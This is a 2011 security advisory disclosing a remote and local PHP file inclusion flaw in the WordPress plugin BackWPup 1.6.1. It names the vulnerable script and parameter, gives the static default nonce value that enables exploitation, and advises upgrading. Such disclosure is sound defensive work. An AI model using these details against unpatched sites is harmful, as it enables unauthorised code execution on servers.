28 Mar Security Advisory – SOS-11-003 – WordPress plugin BackWPup – Remote and local code execution
Release Date: 28-Mar-2011
Last Update: 28-mar-2011
Vendor Notification Date: 25-Mar-2011
Platform: PHP / WordPress
Affected versions: 1.6.1 (verified) and possibly others
Severity Rating: High
Impact: System Access
Attack Vector: Remote without authentication
Solution Status: Upgrade to version 1.7.1
CVE reference: Not yet assigned
A vulnerability has been discovered in the WordPress plugin BackWPup 1.6.1 which can be exploited to execute local or remote code on the web server.
The Input passed to the component wp_xml_export.php via the “wpabs” variable allows the inclusion and execution of local or remote PHP files as long as a “_nonce” value is known. The “_nonce” value relies on a static constant which is not defined in the script meaning that it defaults to the value “822728c8d9”.
Please refer to the PDF version of this advisory for proof of concept code examples.
Upgrade to BackWPup 1.7.1
Phil Taylor from Sense of Security Labs.